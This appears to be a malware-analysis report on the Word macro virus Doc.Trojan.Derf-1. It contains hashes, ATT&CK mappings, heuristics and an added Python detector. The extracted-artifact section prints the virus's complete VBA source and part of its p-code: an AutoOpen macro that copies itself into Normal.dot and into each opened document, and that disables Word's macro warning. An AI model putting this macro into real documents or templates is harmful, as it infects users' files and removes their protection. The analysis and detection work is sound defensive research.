Doc.Trojan.Derf-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 8fa77b1aabbc9f71…

MALICIOUS

Office (OLE)

Size: 35.5 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 863f19fb9b014418c483d12de528fe15
SHA-1: 6ae223aae4a90381d612893eee340b5857e855bb
SHA-256: 8fa77b1aabbc9f716f1ff21e4c79e2bc0a8511e495e615cc8d04b20698ec9087
Risk score: 200

Malware Insights

Doc.Trojan.Derf-1 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is identified as Doc.Trojan.Derf-1 by ClamAV. The AutoOpen VBA macro is a classic Word macro virus. It opens C:\DERF for random access (creating the file if absent) and reads a marker; if the marker is not "Derf", it uses Application.OrganizerCopy to copy its Module1 into the global template (C:\Program Files\Microsoft Office\Templates\Normal.dot) and then writes the marker. On every run it also copies Module1 from Normal.dot back into the current document, so each document opened on an infected installation carries the macro. It then sets Options.VirusProtection = False, disabling Word's macro-virus warning, and with a one-in-ten chance on Sundays (WeekDay(Date) = 1 with the default vbSunday) calls Fred, which shows an InputBox/MsgBox dialog and either removes Module1 from Normal.dot and the document or types the string "1234567890Derf" into the document. Infection via the global template corresponds most precisely to ATT&CK T1137.001 (Office Application Startup: Office Template Macros); the T1547.001 tag above is the analyzer's mapping. The recovered source contains no network, download or shell-execution calls.

Heuristics 4

  • ClamAV: Doc.Trojan.Derf-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Derf-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic's canned description (no modern VBA project recovered, no stronger macro-virus family marker present) does not apply to this sample: a full VBA project was extracted (Macros/VBA/Module1, see Extracted artifacts) and ClamAV names the family, so treat this finding as redundant with OLE_VBA_AUTOOPEN rather than as independent evidence. On its own it indicates old Word macro execution surface, not a downloader or a parser CVE.
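Added example, not part of the analyzer output or of the sample: a small Python triage pass that implements the checks the summary and heuristics above describe over extracted VBA source. It folds VBA line continuations so a multi-line OrganizerCopy call becomes one logical line, then looks for an auto-exec entry point, OrganizerCopy into Normal.dot, VirusProtection = False and an Open ... For Random marker file, and pulls quoted drive-letter paths out as host IOCs. It generalizes slightly beyond this sample by also matching the other Word auto-exec names (AutoExec, AutoNew, AutoClose, Document_Open). The rule IDs other than OLE_VBA_AUTOOPEN, the severity weights, the verdict logic and SAMPLE_VBA are constructed for this example; SAMPLE_VBA is an excerpt modelled on the AutoOpen macro shown below, not the full recovered artifact.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    rule_id: str
    severity: str
    pattern: re.Pattern
    note: str


@dataclass(frozen=True)
class Finding:
    rule_id: str
    severity: str
    evidence: str
    note: str


# Constructed weights; the report's own 0-200 scoring is not documented on the page.
SEVERITY_WEIGHT = {"low": 1, "medium": 3, "high": 6, "critical": 10}

RULES = [
    # Auto-executing entry points: Derf uses AutoOpen, the rest are Word's other auto macros.
    Rule("OLE_VBA_AUTOOPEN", "high",
         re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
                    r"(?:AutoOpen|AutoExec|AutoNew|AutoClose|Document_Open)\s*\(", re.I | re.M),
         "auto-executing macro entry point (T1059.005)"),
    # A module copied into the global template is the infection/persistence step of a macro virus.
    Rule("TEMPLATE_INFECTION", "high",
         re.compile(r"\bOrganizerCopy\b[^\n]*\bNormal\.dotm?\b", re.I),
         "OrganizerCopy into Normal.dot (Office template persistence, T1137.001)"),
    # Word's built-in macro-virus warning switched off.
    Rule("DISABLE_VIRUS_PROTECTION", "high",
         re.compile(r"\bVirusProtection\s*=\s*False\b", re.I),
         "disables Word's macro warning"),
    # File opened at a fixed path for writing/random access: the infection marker.
    Rule("MARKER_FILE", "medium",
         re.compile(r'\bOpen\s+"[A-Za-z]:\\[^"]*"\s+For\s+(?:Random|Output|Append|Binary)\b', re.I),
         "writes a marker file to a fixed path"),
]

# Quoted drive-letter paths are the most useful host IOCs for this family.
PATH_RE = re.compile(r'"([A-Za-z]:\\[^"]+)"')


def join_continuations(src: str) -> str:
    """Fold VBA line continuations (trailing ' _') so a multi-line call is one logical line."""
    return re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", src)


def strip_comment_lines(src: str) -> str:
    """Drop whole-line comments so text such as 'Please don't delete me.' cannot trigger a rule."""
    return re.sub(r"^[ \t]*'.*$", "", src, flags=re.M)


def find_indicators(src: str) -> list[Finding]:
    """Run every rule over the normalized source and return one Finding per match."""
    logical = strip_comment_lines(join_continuations(src))
    findings: list[Finding] = []
    for rule in RULES:
        for m in rule.pattern.finditer(logical):
            findings.append(Finding(rule.rule_id, rule.severity, m.group(0).strip(), rule.note))
    return findings


def extract_paths(src: str) -> list[str]:
    """Return quoted drive-letter paths in order of first appearance, deduplicated."""
    paths: list[str] = []
    for m in PATH_RE.finditer(join_continuations(src)):
        if m.group(1) not in paths:
            paths.append(m.group(1))
    return paths


def risk_score(findings: list[Finding]) -> int:
    return sum(SEVERITY_WEIGHT[f.severity] for f in findings)


def verdict(findings: list[Finding]) -> str:
    """Auto-exec plus template infection or disabled protection is the macro-virus signature."""
    ids = {f.rule_id for f in findings}
    if "OLE_VBA_AUTOOPEN" in ids and ids & {"TEMPLATE_INFECTION", "DISABLE_VIRUS_PROTECTION"}:
        return "MALICIOUS"
    return "SUSPICIOUS" if ids else "CLEAN"


# Constructed excerpt modelled on the AutoOpen macro in the report (not the full artifact).
SAMPLE_VBA = r'''
'Please don't delete me.
Sub AutoOpen()
    DocFileName = Windows(1).Document.FullName
    Open "C:\DERF" For Random As #1
    Get #1, , Text
    Close #1
    If Text <> "Derf" Then
        Application.OrganizerCopy Source:=DocFileName, Destination:= _
        "C:\Program Files\Microsoft Office\Templates\Normal.dot", Name:="Module1" _
        , Object:=wdOrganizerObjectProjectItems
    End If
    With Options
        .VirusProtection = False
    End With
End Sub
'''

if __name__ == "__main__":
    hits = find_indicators(SAMPLE_VBA)
    for f in hits:
        print(f"{f.rule_id:26} {f.severity:7} {f.evidence[:60]}")
    print("paths:", extract_paths(SAMPLE_VBA))
    print("score:", risk_score(hits), "verdict:", verdict(hits))
```

Folding the continuations first matters: the OrganizerCopy call above spans three physical lines, and a line-oriented grep for "OrganizerCopy.*Normal.dot" misses it. Feed it the decoded macros.bas from olevba rather than the raw OLE streams, since the rules work on source text, not on p-code.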

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  7262 bytes
SHA-256: 1ec61db41472648b4ee8283427fbd67a97ceb1368b131f773756aca794fc94df
Detection
ClamAV: Doc.Trojan.Derf-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Dim DocFileName
Sub beeper()
For x = 1 To 100
Beep
For t = 1 To 100000
Next t
Next x
End Sub
'Please don't delete me.

Sub AutoOpen()

    DocFileName = Windows(1).Document.FullName
    
    Open "C:\DERF" For Random As #1
    Get #1, , Text
    Close #1
    
    If Text <> "Derf" Then
    
        Application.OrganizerCopy Source:=DocFileName, Destination:= _
        "C:\Program Files\Microsoft Office\Templates\Normal.dot", Name:="Module1" _
        , Object:=wdOrganizerObjectProjectItems
        Selection.TypeParagraph
    
        Text = "Derf"
        Open "C:\DERF" For Random As #1
        Put #1, , Text
        Close #1
    
    End If
    
    
    On Error GoTo Finish:
    
Other:
    
    Application.OrganizerCopy Source:= _
        "C:\Program Files\Microsoft Office\Templates\Normal.dot", Destination:= _
        DocFileName, Name:="Module1", Object:= _
    wdOrganizerObjectProjectItems
    
Finish:

With Options
    .VirusProtection = False
End With

Randomize (Timer)
If Int(Rnd() * 10) = 5 And WeekDay(Date) = 1 Then
    Fred
End If

End Sub

Sub Fred()

    Ans = InputBox("Hello. My name is Derf. Give me a biscuit.", "Derf")

    If Ans = "biscuit" Or Ans = "a biscuit" Then
        AnsYN = MsgBox("Mmm. Thankyou. Would you like to delete me now?.", vbYesNo, "Derf")
        If AnsYN = Yes Then
            Selection.TypeText Text:="1234567890Derf: Derf is now dead."
            Application.OrganizerDelete Source:= _
            "C:\Program Files\Microsoft Office\Templates\Normal.dot", Name:="Module1" _
            , Object:=wdOrganizerObjectProjectItems
            Application.OrganizerDelete Source:= _
            DocFileName, Name:="Module1" _
            , Object:=wdOrganizerObjectProjectItems
        End If
        If AnsYN = No Then
            GoTo Finish2:
        End If
    Else
        a = MsgBox("OK Then, Bye. I'll be back.", vbOKOnly, "Derf")
    End If
    
    Selection.TypeText Text:="1234567890Derf"

Finish2:

End Sub


' Processing file: /opt/analyzer/scan_staging/cf613df542ab4ab9b09716ae1ac1509c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Module1 - 4069 bytes
' Line #0:
' 	Dim 
' 	VarDefn DocFileName
' Line #1:
' 	FuncDefn (Sub beeper())
' Line #2:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0064 
' 	For 
' Line #3:
' 	ArgsCall Beep 0x0000 
' Line #4:
' 	StartForVariable 
' 	Ld t 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI4 0x86A0 0x0001 
' 	For 
' Line #5:
' 	StartForVariable 
' 	Ld t 
' 	EndForVariable 
' 	NextVar 
' Line #6:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	NextVar 
' Line #7:
' 	EndSub 
' Line #8:
' 	QuoteRem 0x0000 0x0017 "Please don't delete me."
' Line #9:
' Line #10:
' 	FuncDefn (Sub AutoOpen())
' Line #11:
' Line #12:
' 	LitDI2 0x0001 
' 	ArgsLd Windows 0x0001 
' 	MemLd Document 
' 	MemLd FullName 
' 	St DocFileName 
' Line #13:
' Line #14:
' 	LitStr 0x0007 "C:\DERF"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Random)
' Line #15:
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Ld Then 
' 	GetRec 
' Line #16:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #17:
' Line #18:
' 	Ld Then 
' 	LitStr 0x0004 "Derf"
' 	Ne 
' 	IfBlock 
' Line #19:
' Line #20:
' 	LineCont 0x0008 09 00 08 00 0E 00 08 00
' 	Ld DocFileName 
' 	ParamNamed Source 
' 	LitStr 0x0036 "C:\Program Files\Microsoft Office\Templates\Normal.dot"
' 	ParamNamed Destination 
' 	LitStr 0x0007 "Module1"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #21:
' 	Ld Selection 
' 	ArgsMemCall TypeParagraph 0x0000 
' Li
... (truncated)